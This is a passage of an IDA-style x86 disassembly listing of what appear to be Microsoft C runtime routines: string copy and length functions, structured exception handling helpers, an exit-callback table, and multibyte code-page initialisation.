; sub_402460+4F�j
lea edi, [ecx-1]
jmp short loc_4024C5
; ---------------------------------------------------------------------------
loc_4024B8: ; CODE XREF: sub_402460+48�j
lea edi, [ecx-2]
jmp short loc_4024C5
; ---------------------------------------------------------------------------
loc_4024BD: ; CODE XREF: sub_402460+41�j
lea edi, [ecx-3]
jmp short loc_4024C5
; ---------------------------------------------------------------------------
loc_4024C2: ; CODE XREF: sub_402460+3D�j
lea edi, [ecx-4]
loc_4024C5: ; CODE XREF: sub_402450+5�j
; sub_402460+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_4024EE
loc_4024D1: ; CODE XREF: sub_402460+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_402540
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_4024D1
jmp short loc_4024EE
; ---------------------------------------------------------------------------
loc_4024E9: ; CODE XREF: sub_402460+A6�j
; sub_402460+C0�j
mov [edi], edx
add edi, 4
loc_4024EE: ; CODE XREF: sub_402460+6F�j
; sub_402460+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_4024E9
test dl, dl
jz short loc_402540
test dh, dh
jz short loc_402537
test edx, 0FF0000h
jz short loc_40252A
test edx, 0FF000000h
jz short loc_402522
jmp short loc_4024E9
; ---------------------------------------------------------------------------
loc_402522: ; CODE XREF: sub_402460+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40252A: ; CODE XREF: sub_402460+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_402537: ; CODE XREF: sub_402460+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402540: ; CODE XREF: sub_402460+78�j
; sub_402460+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_402460 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402550 proc near ; CODE XREF: .text:00401595�p
; sub_4018FC+C7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4025EF
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_40257C
shr ecx, 2
jnz loc_4025FF
jmp short loc_4025A3
; ---------------------------------------------------------------------------
loc_40257C: ; CODE XREF: sub_402550+1F�j
; sub_402550+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_4025B6
test al, al
jz short loc_4025BE
test esi, 3
jnz short loc_40257C
mov ebx, ecx
shr ecx, 2
jnz short loc_4025FF
loc_40259E: ; CODE XREF: sub_402550+AD�j
and ebx, 3
jz short loc_4025B6
loc_4025A3: ; CODE XREF: sub_402550+2A�j
; sub_402550+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_4025E8
sub ebx, 1
jnz short loc_4025A3
loc_4025B6: ; CODE XREF: sub_402550+39�j
; sub_402550+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4025BE: ; CODE XREF: sub_402550+3D�j
test edi, 3
jz short loc_4025DC
loc_4025C6: ; CODE XREF: sub_402550+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_40266C
test edi, 3
jnz short loc_4025C6
loc_4025DC: ; CODE XREF: sub_402550+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_402657
loc_4025E3: ; CODE XREF: sub_402550+9B�j
; sub_402550+116�j
mov [edi], al
add edi, 1
loc_4025E8: ; CODE XREF: sub_402550+5F�j
sub ebx, 1
jnz short loc_4025E3
pop ebx
pop esi
loc_4025EF: ; CODE XREF: sub_402550+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4025F5: ; CODE XREF: sub_402550+C7�j
; sub_402550+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_40259E
loc_4025FF: ; CODE XREF: sub_402550+24�j
; sub_402550+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4025F5
test dl, dl
jz short loc_402649
test dh, dh
jz short loc_40263F
test edx, 0FF0000h
jz short loc_402635
test edx, 0FF000000h
jnz short loc_4025F5
mov [edi], edx
jmp short loc_40264D
; ---------------------------------------------------------------------------
loc_402635: ; CODE XREF: sub_402550+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_40264D
; ---------------------------------------------------------------------------
loc_40263F: ; CODE XREF: sub_402550+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_40264D
; ---------------------------------------------------------------------------
loc_402649: ; CODE XREF: sub_402550+CB�j
xor edx, edx
mov [edi], edx
loc_40264D: ; CODE XREF: sub_402550+E3�j
; sub_402550+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_402663
loc_402657: ; CODE XREF: sub_402550+91�j
xor eax, eax
loc_402659: ; CODE XREF: sub_402550+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_402659
loc_402663: ; CODE XREF: sub_402550+105�j
and ebx, 3
jnz loc_4025E3
loc_40266C: ; CODE XREF: sub_402550+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_402550 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402680 proc near ; CODE XREF: .text:0040156A�p
; .text:0040157B�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4026B0
loc_40268C: ; CODE XREF: sub_402680+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_4026E3
test ecx, 3
jnz short loc_40268C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_4026B0: ; CODE XREF: sub_402680+A�j
; sub_402680+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4026B0
mov eax, [ecx-4]
test al, al
jz short loc_402701
test ah, ah
jz short loc_4026F7
test eax, 0FF0000h
jz short loc_4026ED
test eax, 0FF000000h
jz short loc_4026E3
jmp short loc_4026B0
; ---------------------------------------------------------------------------
loc_4026E3: ; CODE XREF: sub_402680+13�j
; sub_402680+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4026ED: ; CODE XREF: sub_402680+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_4026F7: ; CODE XREF: sub_402680+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402701: ; CODE XREF: sub_402680+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40270C proc near ; CODE XREF: sub_401660+70�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_402724
push [ebp+arg_0]
call sub_404E12 ; RtlUnwind
loc_402724: ; DATA XREF: sub_40270C+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40270C endp
; =============== S U B R O U T I N E =======================================
sub_40272C proc near ; DATA XREF: sub_40274E+A�o
; .text:004027BF�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40274D
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40274D: ; CODE XREF: sub_40272C+10�j
retn
sub_40272C endp
; =============== S U B R O U T I N E =======================================
sub_40274E proc near ; CODE XREF: sub_401660+7D�p
; sub_401660+D0�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_40272C
push large dword ptr fs:0
mov large fs:0, esp
loc_40276B: ; CODE XREF: sub_40274E:loc_4027A6�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4027A8
cmp esi, [esp+1Ch+arg_4]
jz short loc_4027A8
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4027A6
push 101h
mov eax, [ebx+esi*4+8]
call sub_4027E2
call dword ptr [ebx+esi*4+8]
loc_4027A6: ; CODE XREF: sub_40274E+44�j
jmp short loc_40276B
; ---------------------------------------------------------------------------
loc_4027A8: ; CODE XREF: sub_40274E+2A�j
; sub_40274E+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_40274E endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_40272C
jnz short locret_4027D8
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4027D8
mov eax, 1
locret_4027D8: ; CODE XREF: .text:004027C6�j
; .text:004027D1�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_407170
jmp short loc_4027EC
; =============== S U B R O U T I N E =======================================
sub_4027E2 proc near ; CODE XREF: sub_401660+8E�p
; sub_40274E+4F�p
push ebx
push ecx
mov ebx, offset dword_407170
mov ecx, [ebp+8]
loc_4027EC: ; CODE XREF: .text:004027E0�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_4027E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027FA proc near ; CODE XREF: sub_401660+34�p
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, [esi+8]
test bl, 3
jnz short loc_402828
mov eax, large fs:18h
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
cmp ebx, ecx
mov [ebp+var_4], ecx
jb short loc_40282F
cmp ebx, [eax+4]
jnb short loc_40282F
loc_402828: ; CODE XREF: sub_4027FA+11�j
xor eax, eax
jmp loc_402A1F
; ---------------------------------------------------------------------------
loc_40282F: ; CODE XREF: sub_4027FA+27�j
; sub_4027FA+2C�j
push edi
mov edi, [esi+0Ch]
cmp edi, 0FFFFFFFFh
jnz short loc_402840
loc_402838: ; CODE XREF: sub_4027FA+139�j
; sub_4027FA+19C�j ...
xor eax, eax
inc eax
jmp loc_402A1E
; ---------------------------------------------------------------------------
loc_402840: ; CODE XREF: sub_4027FA+3C�j
xor edx, edx
mov [ebp+arg_0], edx
mov eax, ebx
loc_402847: ; CODE XREF: sub_4027FA+6B�j
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_402856
cmp ecx, edx
jnb loc_40299B
loc_402856: ; CODE XREF: sub_4027FA+52�j
cmp dword ptr [eax+4], 0
jz short loc_40285F
inc [ebp+arg_0]
loc_40285F: ; CODE XREF: sub_4027FA+60�j
inc edx
add eax, 0Ch
cmp edx, edi
jbe short loc_402847
cmp [ebp+arg_0], 0
jz short loc_402881
mov eax, [esi-8]
cmp eax, [ebp+var_4]
jb loc_40299B
cmp eax, esi
jnb loc_40299B
loc_402881: ; CODE XREF: sub_4027FA+71�j
mov eax, dword_407428
mov edi, ebx
and edi, 0FFFFF000h
xor esi, esi
test eax, eax
jle short loc_4028A6
loc_402894: ; CODE XREF: sub_4027FA+AA�j
cmp dword_407430[esi*4], edi
jz loc_40299F
inc esi
cmp esi, eax
jl short loc_402894
loc_4028A6: ; CODE XREF: sub_4027FA+98�j
push 1Ch
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_4050B8 ; VirtualQuery
test eax, eax
jz loc_402A1B
cmp [ebp+var_8], 1000000h
jnz loc_402A1B
test [ebp+var_C], 0CCh
jz short loc_402924
mov ecx, [ebp+var_1C]
cmp word ptr [ecx], 5A4Dh
jnz loc_402A1B
mov eax, [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 4550h
jnz loc_402A1B
cmp word ptr [eax+18h], 10Bh
jnz loc_402A1B
sub ebx, ecx
cmp word ptr [eax+6], 0
movzx ecx, word ptr [eax+14h]
lea ecx, [ecx+eax+18h]
jbe loc_402A1B
mov eax, [ecx+0Ch]
cmp ebx, eax
jb short loc_402924
mov edx, [ecx+8]
add edx, eax
cmp ebx, edx
jnb short loc_402924
test byte ptr [ecx+27h], 80h
jnz short loc_40299B
loc_402924: ; CODE XREF: sub_4027FA+D2�j
; sub_4027FA+119�j ...
push 1
push offset dword_407470
call ds:dword_4050B4 ; InterlockedExchange
test eax, eax
jnz loc_402838
mov ecx, dword_407428
test ecx, ecx
mov edx, ecx
jle short loc_402958
lea eax, ds:40742Ch[ecx*4]
loc_40294C: ; CODE XREF: sub_4027FA+15C�j
cmp [eax], edi
jz short loc_402958
dec edx
sub eax, 4
test edx, edx
jg short loc_40294C
loc_402958: ; CODE XREF: sub_4027FA+149�j
; sub_4027FA+154�j
test edx, edx
jnz short loc_402989
push 0Fh
pop ebx
cmp ecx, ebx
jg short loc_402965
mov ebx, ecx
loc_402965: ; CODE XREF: sub_4027FA+167�j
xor edx, edx
test ebx, ebx
jl short loc_40297D
loc_40296B: ; CODE XREF: sub_4027FA+181�j
lea eax, ds:407430h[edx*4]
mov esi, [eax]
inc edx
cmp edx, ebx
mov [eax], edi
mov edi, esi
jle short loc_40296B
loc_40297D: ; CODE XREF: sub_4027FA+16F�j
cmp ecx, 10h
jge short loc_402989
inc ecx
mov dword_407428, ecx
loc_402989: ; CODE XREF: sub_4027FA+160�j
; sub_4027FA+186�j
push 0
push offset dword_407470
call ds:dword_4050B4 ; InterlockedExchange
jmp loc_402838
; ---------------------------------------------------------------------------
loc_40299B: ; CODE XREF: sub_4027FA+56�j
; sub_4027FA+79�j ...
xor eax, eax
jmp short loc_402A1E
; ---------------------------------------------------------------------------
loc_40299F: ; CODE XREF: sub_4027FA+A1�j
test esi, esi
jle loc_402838
mov ebx, ds:dword_4050B4
push 1
push offset dword_407470
call ebx ; InterlockedExchange
test eax, eax
jnz loc_402838
cmp dword_407430[esi*4], edi
jz short loc_4029F5
mov eax, dword_407428
lea esi, [eax-1]
test esi, esi
jl short loc_4029E3
loc_4029D3: ; CODE XREF: sub_4027FA+1E3�j
cmp dword_407430[esi*4], edi
jz short loc_4029DF
dec esi
jns short loc_4029D3
loc_4029DF: ; CODE XREF: sub_4027FA+1E0�j
test esi, esi
jge short loc_4029F3
loc_4029E3: ; CODE XREF: sub_4027FA+1D7�j
cmp eax, 10h
jge short loc_4029EE
inc eax
mov dword_407428, eax
loc_4029EE: ; CODE XREF: sub_4027FA+1EC�j
lea esi, [eax-1]
jmp short loc_4029F5
; ---------------------------------------------------------------------------
loc_4029F3: ; CODE XREF: sub_4027FA+1E7�j
jz short loc_402A0D
loc_4029F5: ; CODE XREF: sub_4027FA+1CB�j
; sub_4027FA+1F7�j
xor ecx, ecx
test esi, esi
jl short loc_402A0D
loc_4029FB: ; CODE XREF: sub_4027FA+211�j
lea eax, ds:407430h[ecx*4]
mov edx, [eax]
inc ecx
cmp ecx, esi
mov [eax], edi
mov edi, edx
jle short loc_4029FB
loc_402A0D: ; CODE XREF: sub_4027FA:loc_4029F3�j
; sub_4027FA+1FF�j
push 0
push offset dword_407470
call ebx ; InterlockedExchange
jmp loc_402838
; ---------------------------------------------------------------------------
loc_402A1B: ; CODE XREF: sub_4027FA+BB�j
; sub_4027FA+C8�j ...
or eax, 0FFFFFFFFh
loc_402A1E: ; CODE XREF: sub_4027FA+41�j
; sub_4027FA+1A3�j
pop edi
loc_402A1F: ; CODE XREF: sub_4027FA+30�j
pop esi
pop ebx
leave
retn
sub_4027FA endp
; =============== S U B R O U T I N E =======================================
sub_402A23 proc near ; CODE XREF: sub_402AA5+4�p
arg_0 = dword ptr 4
push esi
push dword_407828
call sub_403F92
pop ecx
mov ecx, dword_407824
mov esi, eax
mov eax, dword_407828
mov edx, ecx
sub edx, eax
add edx, 4
cmp esi, edx
jnb short loc_402A96
mov ecx, 800h
cmp esi, ecx
jnb short loc_402A53
mov ecx, esi
loc_402A53: ; CODE XREF: sub_402A23+2C�j
add ecx, esi
push ecx
push eax
call sub_403E30
test eax, eax
pop ecx
pop ecx
jnz short loc_402A79
add esi, 10h
push esi
push dword_407828
call sub_403E30
test eax, eax
pop ecx
pop ecx
jnz short loc_402A79
pop esi
retn
; ---------------------------------------------------------------------------
loc_402A79: ; CODE XREF: sub_402A23+3D�j
; sub_402A23+52�j
mov ecx, dword_407824
sub ecx, dword_407828
mov dword_407828, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov dword_407824, ecx
loc_402A96: ; CODE XREF: sub_402A23+23�j
mov eax, [esp+4+arg_0]
mov [ecx], eax
add dword_407824, 4
pop esi
retn
sub_402A23 endp
; =============== S U B R O U T I N E =======================================
sub_402AA5 proc near ; CODE XREF: sub_401761+70�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402A23
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_402AA5 endp
; =============== S U B R O U T I N E =======================================
sub_402AB7 proc near ; DATA XREF: .data:00407010�o
push 80h
call sub_402FB5
test eax, eax
pop ecx
mov dword_407828, eax
jnz short loc_402ACF
push 18h
pop eax
retn
; ---------------------------------------------------------------------------
loc_402ACF: ; CODE XREF: sub_402AB7+12�j
and dword ptr [eax], 0
mov eax, dword_407828
mov dword_407824, eax
xor eax, eax
retn
sub_402AB7 endp
; =============== S U B R O U T I N E =======================================
sub_402ADF proc near ; CODE XREF: sub_402B12+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_4074E1[eax], cl
jnz short loc_402B0E
cmp [esp+arg_4], 0
jz short loc_402B07
mov ecx, off_407280
movzx eax, word ptr [ecx+eax*2]
and eax, [esp+arg_4]
jmp short loc_402B09
; ---------------------------------------------------------------------------
loc_402B07: ; CODE XREF: sub_402ADF+16�j
xor eax, eax
loc_402B09: ; CODE XREF: sub_402ADF+26�j
test eax, eax
jnz short loc_402B0E
retn
; ---------------------------------------------------------------------------
loc_402B0E: ; CODE XREF: sub_402ADF+F�j
; sub_402ADF+2C�j
xor eax, eax
inc eax
retn
sub_402ADF endp
; =============== S U B R O U T I N E =======================================
sub_402B12 proc near ; CODE XREF: sub_401C1D+3F�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_402ADF
add esp, 0Ch
retn
sub_402B12 endp
; =============== S U B R O U T I N E =======================================
sub_402B23 proc near ; CODE XREF: sub_402D07+157�p
; sub_402D07+19C�p
sub eax, 3A4h
jz short loc_402B4C
sub eax, 4
jz short loc_402B46
sub eax, 0Dh
jz short loc_402B40
dec eax
jz short loc_402B3A
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402B3A: ; CODE XREF: sub_402B23+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_402B40: ; CODE XREF: sub_402B23+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_402B46: ; CODE XREF: sub_402B23+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_402B4C: ; CODE XREF: sub_402B23+5�j
mov eax, 411h
retn
sub_402B23 endp
; =============== S U B R O U T I N E =======================================
sub_402B52 proc near ; CODE XREF: sub_402D07:loc_402ECF�p
push edi
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4074E0
rep stosd
stosb
xor eax, eax
mov dword_4075E4, eax
mov dword_4074C8, eax
mov dword_4074C4, eax
mov edi, offset dword_4075F0
stosd
stosd
stosd
pop edi
retn
sub_402B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B7B proc near ; CODE XREF: sub_402D07:loc_402ED4�p
var_518 = word ptr -518h
var_318 = byte ptr -318h
var_218 = byte ptr -218h
var_118 = byte ptr -118h
var_18 = byte ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 518h
mov eax, dword_407030
mov [ebp+var_4], eax
push esi
lea eax, [ebp+var_18]
push eax
push dword_4075E4
call ds:dword_4050C4 ; GetCPInfo
cmp eax, 1
mov esi, 100h
jnz loc_402CB8
xor eax, eax
loc_402BAD: ; CODE XREF: sub_402B7B+3C�j
mov [ebp+eax+var_118], al
inc eax
cmp eax, esi
jb short loc_402BAD
mov al, [ebp+var_12]
test al, al
mov [ebp+var_118], 20h
jz short loc_402BFD
push ebx
lea edx, [ebp+var_11]
push edi
loc_402BCC: ; CODE XREF: sub_402B7B+7E�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_402BF3
sub ecx, eax
inc ecx
mov ebx, ecx
shr ecx, 2
lea edi, [ebp+eax+var_118]
mov eax, 20202020h
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_402BF3: ; CODE XREF: sub_402B7B+59�j
inc edx
mov al, [edx]
inc edx
test al, al
jnz short loc_402BCC
pop edi
pop ebx
loc_402BFD: ; CODE XREF: sub_402B7B+4A�j
push 0
push dword_4074C4
lea eax, [ebp+var_518]
push dword_4075E4
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 1
call sub_404386
push 0
push dword_4075E4
lea eax, [ebp+var_218]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push esi
push dword_4074C4
call sub_403FCA
push 0
push dword_4075E4
lea eax, [ebp+var_318]
push esi
push eax
push esi
lea eax, [ebp+var_118]
push eax
push 200h
push dword_4074C4
call sub_403FCA
add esp, 5Ch
xor eax, eax
loc_402C72: ; CODE XREF: sub_402B7B+139�j
mov cx, [ebp+eax*2+var_518]
test cl, 1
jz short loc_402C95
or byte_4074E1[eax], 10h
mov cl, [ebp+eax+var_218]
loc_402C8D: ; CODE XREF: sub_402B7B+12D�j
mov byte_407600[eax], cl
jmp short loc_402CB1
; ---------------------------------------------------------------------------
loc_402C95: ; CODE XREF: sub_402B7B+102�j
test cl, 2
jz short loc_402CAA
or byte_4074E1[eax], 20h
mov cl, [ebp+eax+var_318]
jmp short loc_402C8D
; ---------------------------------------------------------------------------
loc_402CAA: ; CODE XREF: sub_402B7B+11D�j
mov byte_407600[eax], 0
loc_402CB1: ; CODE XREF: sub_402B7B+118�j
inc eax
cmp eax, esi
jb short loc_402C72
jmp short loc_402CFC
; ---------------------------------------------------------------------------
loc_402CB8: ; CODE XREF: sub_402B7B+2A�j
xor eax, eax
loc_402CBA: ; CODE XREF: sub_402B7B+17F�j
cmp eax, 41h
jb short loc_402CD8
cmp eax, 5Ah
ja short loc_402CD8
or byte_4074E1[eax], 10h
mov cl, al
add cl, 20h
loc_402CD0: ; CODE XREF: sub_402B7B+173�j
mov byte_407600[eax], cl
jmp short loc_402CF7
; ---------------------------------------------------------------------------
loc_402CD8: ; CODE XREF: sub_402B7B+142�j
; sub_402B7B+147�j
cmp eax, 61h
jb short loc_402CF0
cmp eax, 7Ah
ja short loc_402CF0
or byte_4074E1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_402CD0
; ---------------------------------------------------------------------------
loc_402CF0: ; CODE XREF: sub_402B7B+160�j
; sub_402B7B+165�j
mov byte_407600[eax], 0
loc_402CF7: ; CODE XREF: sub_402B7B+15B�j
inc eax
cmp eax, esi
jb short loc_402CBA
loc_402CFC: ; CODE XREF: sub_402B7B+13B�j
mov ecx, [ebp+var_4]
pop esi
call sub_40124E
leave
retn
sub_402B7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D07 proc near ; CODE XREF: sub_402EED+B�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, dword_407030
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, 0FFFFFFFEh
mov [ebp+var_4], eax
push edi
mov dword_407474, ebx
jnz short loc_402D3A
mov dword_407474, 1
call ds:dword_4050C0 ; GetOEMCP
jmp short loc_402D65
; ---------------------------------------------------------------------------
loc_402D3A: ; CODE XREF: sub_402D07+1F�j
cmp esi, 0FFFFFFFDh
jnz short loc_402D51
mov dword_407474, 1
call ds:dword_4050BC ; GetACP
jmp short loc_402D65
; ---------------------------------------------------------------------------
loc_402D51: ; CODE XREF: sub_402D07+36�j
cmp esi, 0FFFFFFFCh
jnz short loc_402D6A
mov eax, dword_407490
mov dword_407474, 1
loc_402D65: ; CODE XREF: sub_402D07+31�j
; sub_402D07+48�j
mov [ebp+arg_0], eax
mov esi, eax
loc_402D6A: ; CODE XREF: sub_402D07+4D�j
cmp esi, dword_4075E4
jz loc_402ED9
cmp esi, ebx
jz loc_402ECF
xor edx, edx
xor eax, eax
loc_402D82: ; CODE XREF: sub_402D07+8C�j
cmp dword_407188[eax], esi
jz short loc_402DF1
add eax, 30h
inc edx
cmp eax, 0F0h
jb short loc_402D82
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_4050C4 ; GetCPInfo
cmp eax, 1
jnz loc_402EC7
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4074E0
rep stosd
stosb
xor edi, edi
inc edi
cmp [ebp+var_18], edi
mov dword_4075E4, esi
mov dword_4074C4, ebx
jbe loc_402EB5
cmp [ebp+var_12], 0
jz loc_402E90
lea ecx, [ebp+var_11]
loc_402DDB: ; CODE XREF: sub_402D07+183�j
mov dl, [ecx]
test dl, dl
jz loc_402E90
movzx eax, byte ptr [ecx-1]
movzx edx, dl
jmp loc_402E80
; ---------------------------------------------------------------------------
loc_402DF1: ; CODE XREF: sub_402D07+81�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4074E0
rep stosd
lea ecx, [edx+edx*2]
shl ecx, 4
mov [ebp+var_1C], ebx
stosb
lea ebx, dword_407198[ecx]
loc_402E0D: ; CODE XREF: sub_402D07+143�j
mov al, [ebx]
mov esi, ebx
jmp short loc_402E3C
; ---------------------------------------------------------------------------
loc_402E13: ; CODE XREF: sub_402D07+137�j
mov dl, [esi+1]
test dl, dl
jz short loc_402E40
movzx eax, al
movzx edi, dl
cmp eax, edi
ja short loc_402E38
mov edx, [ebp+var_1C]
mov dl, byte_407180[edx]
loc_402E2D: ; CODE XREF: sub_402D07+12F�j
or byte_4074E1[eax], dl
inc eax
cmp eax, edi
jbe short loc_402E2D
loc_402E38: ; CODE XREF: sub_402D07+11B�j
inc esi
inc esi
mov al, [esi]
loc_402E3C: ; CODE XREF: sub_402D07+10A�j
test al, al
jnz short loc_402E13
loc_402E40: ; CODE XREF: sub_402D07+111�j
inc [ebp+var_1C]
add ebx, 8
cmp [ebp+var_1C], 4
jb short loc_402E0D
mov eax, [ebp+arg_0]
mov dword_4075E4, eax
mov dword_4074C8, 1
call sub_402B23
lea esi, dword_40718C[ecx]
mov edi, offset dword_4075F0
movsd
movsd
mov dword_4074C4, eax
movsd
jmp short loc_402ED4
; ---------------------------------------------------------------------------
loc_402E78: ; CODE XREF: sub_402D07+17B�j
or byte_4074E1[eax], 4
inc eax
loc_402E80: ; CODE XREF: sub_402D07+E5�j
cmp eax, edx
jbe short loc_402E78
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_402DDB
loc_402E90: ; CODE XREF: sub_402D07+CB�j
; sub_402D07+D8�j
mov eax, edi
loc_402E92: ; CODE XREF: sub_402D07+198�j
or byte_4074E1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_402E92
mov eax, esi
call sub_402B23
mov dword_4074C4, eax
mov dword_4074C8, edi
jmp short loc_402EBB
; ---------------------------------------------------------------------------
loc_402EB5: ; CODE XREF: sub_402D07+C1�j
mov dword_4074C8, ebx
loc_402EBB: ; CODE XREF: sub_402D07+1AC�j
xor eax, eax
mov edi, offset dword_4075F0
stosd
stosd
stosd
jmp short loc_402ED4
; ---------------------------------------------------------------------------
loc_402EC7: ; CODE XREF: sub_402D07+9C�j
cmp dword_407474, ebx
jz short loc_402EDD
loc_402ECF: ; CODE XREF: sub_402D07+71�j
call sub_402B52
loc_402ED4: ; CODE XREF: sub_402D07+16F�j
; sub_402D07+1BE�j
call sub_402B7B
loc_402ED9: ; CODE XREF: sub_402D07+69�j
xor eax, eax
jmp short loc_402EE0
; ---------------------------------------------------------------------------
loc_402EDD: ; CODE XREF: sub_402D07+1C6�j
or eax, 0FFFFFFFFh
loc_402EE0: ; CODE XREF: sub_402D07+1D4�j
mov ecx, [ebp+var_4]
